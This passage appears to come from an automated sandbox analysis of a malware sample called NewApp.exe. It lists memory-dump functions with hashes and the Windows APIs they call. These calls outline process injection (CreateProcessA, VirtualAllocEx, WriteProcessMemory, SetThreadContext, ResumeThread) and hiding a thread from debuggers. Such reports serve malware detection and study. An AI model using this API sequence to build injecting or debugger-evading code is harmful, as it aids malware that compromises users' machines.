                                                      Function 063AE683, Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c50a30c80027bfe0a38d4694416da898e6f49fc89737eb255e7d1dd0473d28a
                                                      • Instruction ID: b710089747dbeb982fe0985b8434d27037b5cc3f9b2c5c7d7072ce69cf36ccc7
                                                      • Opcode Fuzzy Hash: 6c50a30c80027bfe0a38d4694416da898e6f49fc89737eb255e7d1dd0473d28a
                                                      • Instruction Fuzzy Hash: 48E06D32B105188B8FC4F7B8D8509DD73F2EBC8214B108064C61AFB394DE349C019BE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AC533, Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 55027dce0f723467cc63de34e5b2f896842a81e902577cdcaaa1451a7fbd02f3
                                                      • Instruction ID: b7cc0552671ebe090c2eb323cf774ad96fdf0b7a847ee89410e17ea7411d50f3
                                                      • Opcode Fuzzy Hash: 55027dce0f723467cc63de34e5b2f896842a81e902577cdcaaa1451a7fbd02f3
                                                      • Instruction Fuzzy Hash: FCE0ED76B105188B8FC4F7B9D850ADD73F6EBC8214B108069D51AFB394DE349D059BE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AD913, Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fa1925c1904b274dee26fc5c4449f39e070e255e5a12ffe64a10c3f4dfbe306
                                                      • Instruction ID: d7a4df333bdb82ad0dc62df76c953ae7d37647b99d13fcbe8169876169b1a79d
                                                      • Opcode Fuzzy Hash: 2fa1925c1904b274dee26fc5c4449f39e070e255e5a12ffe64a10c3f4dfbe306
                                                      • Instruction Fuzzy Hash: 94E0C976B101188B8BC4F7A8D8509DD73E2EBC8214B108069D51AFB794DE349D0597E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063A81F8, Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4b8ae4ae52388fbb03e9af07c2c275539856c32440cebd55449a7b9853dcdb0
                                                      • Instruction ID: ba136316e700ea87cb100b6558fb32de571e9ddefbcd497f0b660439d423986e
                                                      • Opcode Fuzzy Hash: c4b8ae4ae52388fbb03e9af07c2c275539856c32440cebd55449a7b9853dcdb0
                                                      • Instruction Fuzzy Hash: CBE01271E002199F4744EBADA8046AEBAFDDACC261F00417AD61DE3340EA7049018BE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063A8EC8, Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 61db92c730695d8a8886a3ffa812789d3fbbf07c6d13bdd7aeec8d5c91ebd9ec
                                                      • Instruction ID: 4bf03ec521153cb8578912e3d5387b84046ad77f4328b371d5040f0cb04feb3e
                                                      • Opcode Fuzzy Hash: 61db92c730695d8a8886a3ffa812789d3fbbf07c6d13bdd7aeec8d5c91ebd9ec
                                                      • Instruction Fuzzy Hash: 97E0C2B0D0030ADFCB90EFB984066AEBFF5EB08200F204969C119E6641EB7586409BD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AB359, Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13c07b84e93de99708e9f121e7387de8eafbef778d9712bf17717f4e34507b62
                                                      • Instruction ID: 2a4fea86b2ca8a99e5728b25849fbc84a3cc5790f009eee86bc78ace25a8ae9c
                                                      • Opcode Fuzzy Hash: 13c07b84e93de99708e9f121e7387de8eafbef778d9712bf17717f4e34507b62
                                                      • Instruction Fuzzy Hash: 0AD05E70E013098FE7C8EBA8D5516BDBBA6DF84704F10502A961ADF340EE348C01C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 063A9EB8, Relevance: 5.4, Strings: 4, Instructions: 402COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.919128922.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (TPZ$O<yR$BmA$~MO
                                                      • API String ID: 0-949497818
                                                      • Opcode ID: 95be5a6cd4aa27d5a93b89881b242b6c5481d0c0b6c558222f51cd654a86b81f
                                                      • Instruction ID: 8613a247ac639c9c5634f2bf8d5a555daae1386930978362f4324c6db72f028e
                                                      • Opcode Fuzzy Hash: 95be5a6cd4aa27d5a93b89881b242b6c5481d0c0b6c558222f51cd654a86b81f
                                                      • Instruction Fuzzy Hash: E9F17535A10205CFD784DFA8C488AADF7B6FB88314F54856AE409AB791DB30EC49DBD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Analysis Process: NewApp.exe PID: 2092 Parent PID: 3424 NewApp.exeCOMMON

                                                      Executed Functions

                                                      Function 02DD92E0, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,02DD9F4F,00000000,00000000), ref: 02DDA0A0
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.817129042.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationThread
                                                      • String ID:
                                                      • API String ID: 4046476035-0
                                                      • Opcode ID: 3558b6c555432ab941b34bd9ddab500bec3349ff308860c6e8f0454f51d8aa5c
                                                      • Instruction ID: b83e50d2cf67cfd32f3a3ce274a67a0b17e725ec5a48c49a2b5b9e412deff94b
                                                      • Opcode Fuzzy Hash: 3558b6c555432ab941b34bd9ddab500bec3349ff308860c6e8f0454f51d8aa5c
                                                      • Instruction Fuzzy Hash: 581149719006089FCB20DF9AC488BDFBBF4EB48364F208459E459B7710C775A948CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE2A35, Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05FE2C76
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 99d0afb638272f656e8b40f0c15822f305bc384d173aa412634b5ddceac5b58b
                                                      • Instruction ID: 36a357c0def967391d5c8e9339606002280a5b77e10bf0c72120c76b4aba2ce9
                                                      • Opcode Fuzzy Hash: 99d0afb638272f656e8b40f0c15822f305bc384d173aa412634b5ddceac5b58b
                                                      • Instruction Fuzzy Hash: 3E915E75D00219DFDB20DFA8C881BEDBBB6BF48314F148569D809B7250EB789A85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE2A40, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05FE2C76
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 1cf5b816f2653a736d102b9ab5b67ce750e05ce14fdf2b33526bbb41bd4bbc95
                                                      • Instruction ID: 840965f7741370227720bb1afbfee740909a034a38dd9900d1369882c170a7f2
                                                      • Opcode Fuzzy Hash: 1cf5b816f2653a736d102b9ab5b67ce750e05ce14fdf2b33526bbb41bd4bbc95
                                                      • Instruction Fuzzy Hash: 20914F75D00219DFDF20DFA8C881BEDBBB6BF48314F148569D809A7250EB789A85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE3F30, Relevance: 1.7, APIs: 1, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • KiUserExceptionDispatcher.NTDLL ref: 05FE3F89
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: DispatcherExceptionUser
                                                      • String ID:
                                                      • API String ID: 6842923-0
                                                      • Opcode ID: 0f6b4b602a873620d0cbd22feac43065c652707592c9729847ef82cfd860da28
                                                      • Instruction ID: cd27e80338af8f7063e8615c8bdaaf6575a1e7f7f31e4e65ac5fec5522a28713
                                                      • Opcode Fuzzy Hash: 0f6b4b602a873620d0cbd22feac43065c652707592c9729847ef82cfd860da28
                                                      • Instruction Fuzzy Hash: 56A12470E042098BDF18DFE9D898B9DBBF2BF84354F198068D415BB784D7389885CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE3F20, Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • KiUserExceptionDispatcher.NTDLL ref: 05FE3F89
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: DispatcherExceptionUser
                                                      • String ID:
                                                      • API String ID: 6842923-0
                                                      • Opcode ID: 48197001b083ff540336f44aa6154a54b9cb90384ca0aab23048ad46326f4b5c
                                                      • Instruction ID: f5b4d5ff415460b2ed56256eac1780338279f96d23b14957a22c0bafa3b28bcb
                                                      • Opcode Fuzzy Hash: 48197001b083ff540336f44aa6154a54b9cb90384ca0aab23048ad46326f4b5c
                                                      • Instruction Fuzzy Hash: 17610670D046088BDB18DFE9D888ADDBBB2BF88314F158158D415BB784D739A885CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE3DCE, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 05FE3EDE
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: KernelObjectSecurity
                                                      • String ID:
                                                      • API String ID: 3015937269-0
                                                      • Opcode ID: 42d73e3edd2d5055bb0f61be750346cdfc8eaf2c9a7e9de51594390745cbbc39
                                                      • Instruction ID: 0980c2ee2e9da1d25e0b81fa2680963b6abc83e785184846b5aedb085cc7023c
                                                      • Opcode Fuzzy Hash: 42d73e3edd2d5055bb0f61be750346cdfc8eaf2c9a7e9de51594390745cbbc39
                                                      • Instruction Fuzzy Hash: E1219CB59002098FCB10CFA9D489BEEBBF4EF48314F14846AD459A7781D778A948CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE21B1, Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05FE2248
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 75be940f355f5b0465d6b0f3ccafbf0e40d5af1534ecb63ad9853a3df5fd6dc8
                                                      • Instruction ID: aca867a6f9f9bb860ba1ea3f35edf09711d6bdcf6ea111ba5a94faab82b6454f
                                                      • Opcode Fuzzy Hash: 75be940f355f5b0465d6b0f3ccafbf0e40d5af1534ecb63ad9853a3df5fd6dc8
                                                      • Instruction Fuzzy Hash: 832146759003099FDF00CFA9C885BEEBBF5FF48324F10842AE919A7640D778A945CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE21B8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05FE2248
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 9dfc762e43d4edf3217e8fdcfec1f3473ad84ca239922deda4656a94414a06bc
                                                      • Instruction ID: 6318cb8476240273c2e68911afa5dc86126b337104e58567de38f3431dc2e316
                                                      • Opcode Fuzzy Hash: 9dfc762e43d4edf3217e8fdcfec1f3473ad84ca239922deda4656a94414a06bc
                                                      • Instruction Fuzzy Hash: A92124759003499FDF00CFA9C885BEEBBF5FF48324F10842AE919A7640D778A945CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE08B8, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 05FE3EDE
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: KernelObjectSecurity
                                                      • String ID:
                                                      • API String ID: 3015937269-0
                                                      • Opcode ID: f396eb27ad37430ec86d1cc019cf432a524c9dd1f5d7ddde14f5358d12fecfe8
                                                      • Instruction ID: 00201f855e6559f3f94a10d44255f8da8377525813f20c46170dcbd834a6f769
                                                      • Opcode Fuzzy Hash: f396eb27ad37430ec86d1cc019cf432a524c9dd1f5d7ddde14f5358d12fecfe8
                                                      • Instruction Fuzzy Hash: 94212C719002099FCB10CF9AC489BEEBBF4EF48324F14842DE519A7740D778A948CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE24A2, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05FE2528
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 9011f2556604e0115b045c9d83225a15d0db644e41df8bf3bd5c720090c37905
                                                      • Instruction ID: 4591f21bcefd77a9c395eb6945d8b35967d8b1921b85b9528bdf99a530302089
                                                      • Opcode Fuzzy Hash: 9011f2556604e0115b045c9d83225a15d0db644e41df8bf3bd5c720090c37905
                                                      • Instruction Fuzzy Hash: 762116B5C003499FCB00CFA9C885BEEBBF5FF48324F548429E519A7640D778A945CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE1210, Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 05FE1296
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 39e0f3e371200b2fc32bfe23e363ed2b884174f17c0d39dcf1d65fc112abd3df
                                                      • Instruction ID: 2fa1778f11ef4a41cb0cc70b285698334e0bdd8aa510f096f18da32c9edbffee
                                                      • Opcode Fuzzy Hash: 39e0f3e371200b2fc32bfe23e363ed2b884174f17c0d39dcf1d65fc112abd3df
                                                      • Instruction Fuzzy Hash: 4C2138B1D002088FDB10DFA9C8857EEBBF5AF48364F54842AD419B7740CB78A949CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE24A8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05FE2528
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 77901d10e58f2ce838ccdafb019f5f0ee30acaab39d41a29625261313aa0a872
                                                      • Instruction ID: c9b8aa47cf4ebb461d71df24960c964f7eaa1a3f92750d2366046df296113b6f
                                                      • Opcode Fuzzy Hash: 77901d10e58f2ce838ccdafb019f5f0ee30acaab39d41a29625261313aa0a872
                                                      • Instruction Fuzzy Hash: C1211671C003499FCB00CFA9C885BEEBBF5FF48324F508429E519A7640D778A945CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE1218, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 05FE1296
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: a723487b1a5bce06bf5ddc8b746438fcc6d896d0688cffc30a757e230b07a3b2
                                                      • Instruction ID: 55d127e21b44b3bb3d59d1dde8c5499a5da15ca6f90c0abfedfdf4e61b0e07d8
                                                      • Opcode Fuzzy Hash: a723487b1a5bce06bf5ddc8b746438fcc6d896d0688cffc30a757e230b07a3b2
                                                      • Instruction Fuzzy Hash: 42211871D002099FDB10DFAAC885BEEBBF4AF48364F548429D519A7640CB78A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE1EF2, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05FE1F66
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 2f9d759562a31ecec87619afa34aef70294064b972fc1c5cc998b1b4ab863536
                                                      • Instruction ID: 366feb9e964af7da48367229aa1176374e470a6395f96b0ef747c52a02b1beb1
                                                      • Opcode Fuzzy Hash: 2f9d759562a31ecec87619afa34aef70294064b972fc1c5cc998b1b4ab863536
                                                      • Instruction Fuzzy Hash: E81156768002489FCF10DFAAC845BEFBBF5EB48324F148419E519A7650C779A944CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE1EF8, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05FE1F66
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 590dbd81d136f293da766201be9e3c89e8dccec8ca25d55c029eda958db13cf0
                                                      • Instruction ID: c3386fb4141368bdc097ca19211aa613c51b8c107c11783b6a0cb0c98f74947d
                                                      • Opcode Fuzzy Hash: 590dbd81d136f293da766201be9e3c89e8dccec8ca25d55c029eda958db13cf0
                                                      • Instruction Fuzzy Hash: B41164728002489FCF10CFAAC844BEFBBF5AF48324F148419E51AA7650CB79A944CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE3010, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 805b0dba12d3c0db2e283bc9fb0d9a3cd5f9abafa4b9a838f4374590c1cf875f
                                                      • Instruction ID: 2bab0c900067376d2fbb06e82cd9ae889944594418a08ca31adbb25a4a102060
                                                      • Opcode Fuzzy Hash: 805b0dba12d3c0db2e283bc9fb0d9a3cd5f9abafa4b9a838f4374590c1cf875f
                                                      • Instruction Fuzzy Hash: D7115BB1D002088FCB10DFA9C8497DFBBF5AB88228F148819D519B7740C779A944CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05FE3018, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.849552540.0000000005FE0000.00000040.00000001.sdmp, Offset: 05FE0000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: c6e68f85de803ed8656c97e5fbf81322b69033df09e3638e7069cf1b7981212e
                                                      • Instruction ID: ddb257cdf6eb23e7126ec288ff75aee5cfc583016d7a23eace019e45a2cedaee
                                                      • Opcode Fuzzy Hash: c6e68f85de803ed8656c97e5fbf81322b69033df09e3638e7069cf1b7981212e
                                                      • Instruction Fuzzy Hash: 58112871D002488FCB10DFA9C8497EEBBF5AB88228F148419D519A7650CB79A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: NewApp.exe PID: 1216 Parent PID: 3424 NewApp.exeCOMMON

                                                      Executed Functions

                                                      Function 024192E0, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,02419F4F,00000000,00000000), ref: 0241A0A0
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.817056119.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationThread
                                                      • String ID:
                                                      • API String ID: 4046476035-0
                                                      • Opcode ID: 34ce6336923ede822236f05ae23670c6c7191fd8f59478bdebce22471b8db483
                                                      • Instruction ID: f20f39c707740a06b5034c21c871840c9db423fa5f308d802cd3f5eb506acb3e
                                                      • Opcode Fuzzy Hash: 34ce6336923ede822236f05ae23670c6c7191fd8f59478bdebce22471b8db483
                                                      • Instruction Fuzzy Hash: F21134B19002089FCB20DF9AC988BDFBFF4EB48324F10845AE419A7710D775A948CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0241A031, Relevance: 1.6, APIs: 1, Instructions: 52nativethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,02419F4F,00000000,00000000), ref: 0241A0A0
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.817056119.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationThread
                                                      • String ID:
                                                      • API String ID: 4046476035-0
                                                      • Opcode ID: a442e54796d71d67171f687a14e1403863a949c9621ce77ee5ae29fc844e7243
                                                      • Instruction ID: 8377dd653f49e5510608d4e0cd6cea3e7ff6d58fd75c0fece952fb8ab25d8096
                                                      • Opcode Fuzzy Hash: a442e54796d71d67171f687a14e1403863a949c9621ce77ee5ae29fc844e7243
                                                      • Instruction Fuzzy Hash: 3A1146B19002089FCB20DF9AC885BDFBFF4EB48324F148419E418A7750C775A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05632A35, Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05632C76
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 5803d196f894953a7b63906d1425a0ed7a9e3eb6bbc88504d65077e328556765
                                                      • Instruction ID: 272f50c497161f866481c0dfd2ae084f8b8b6f328851e2ae2f935e05ed3a663d
                                                      • Opcode Fuzzy Hash: 5803d196f894953a7b63906d1425a0ed7a9e3eb6bbc88504d65077e328556765
                                                      • Instruction Fuzzy Hash: B3A14A75D00219DFDB24CFA4C892BEEBBB2BF48314F1485A9D809A7340DB749985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05632A40, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05632C76
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6fc335ea3a5ba72c9ee36c5ab352ba4fc0ecaf7b29dcec3847bc2ba78e909494
                                                      • Instruction ID: 82011b98d5ebd0aeb86298c07b90db4864a79fd45f677151eeccabd98f18f287
                                                      • Opcode Fuzzy Hash: 6fc335ea3a5ba72c9ee36c5ab352ba4fc0ecaf7b29dcec3847bc2ba78e909494
                                                      • Instruction Fuzzy Hash: B6914A75D00219DFDB24CF68C892BEEBBB2BF48314F1485A9D809A7350DB749985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05633F20, Relevance: 1.7, APIs: 1, Instructions: 236COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • KiUserExceptionDispatcher.NTDLL ref: 05633F89
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: DispatcherExceptionUser
                                                      • String ID:
                                                      • API String ID: 6842923-0
                                                      • Opcode ID: 254c37d806a8befff944ee365ed3100407716fcddf4a9cfa1380728c7644c9ef
                                                      • Instruction ID: b6037eb8502740495263b789226f27b0f0d2e933a69fd2ad66d5e960bcf7a23e
                                                      • Opcode Fuzzy Hash: 254c37d806a8befff944ee365ed3100407716fcddf4a9cfa1380728c7644c9ef
                                                      • Instruction Fuzzy Hash: 32A11570A042098BDB28DFE9D89ABADFBF2FF44355F198058D001BB394DB349985CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 056321B1, Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05632248
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: a4141a0a3b8c67ddcf3d1ff8284994cde3f435101b82a3ff1459dc3fa20b46c2
                                                      • Instruction ID: 074144b099be2f6f007c3f9920eb335f450758f53dfbf6a8364134eef764cbab
                                                      • Opcode Fuzzy Hash: a4141a0a3b8c67ddcf3d1ff8284994cde3f435101b82a3ff1459dc3fa20b46c2
                                                      • Instruction Fuzzy Hash: 452137719002099FCF10CFA9C885BEEBBF5FF48324F108429E919A7740C778A945CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 056321B8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05632248
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
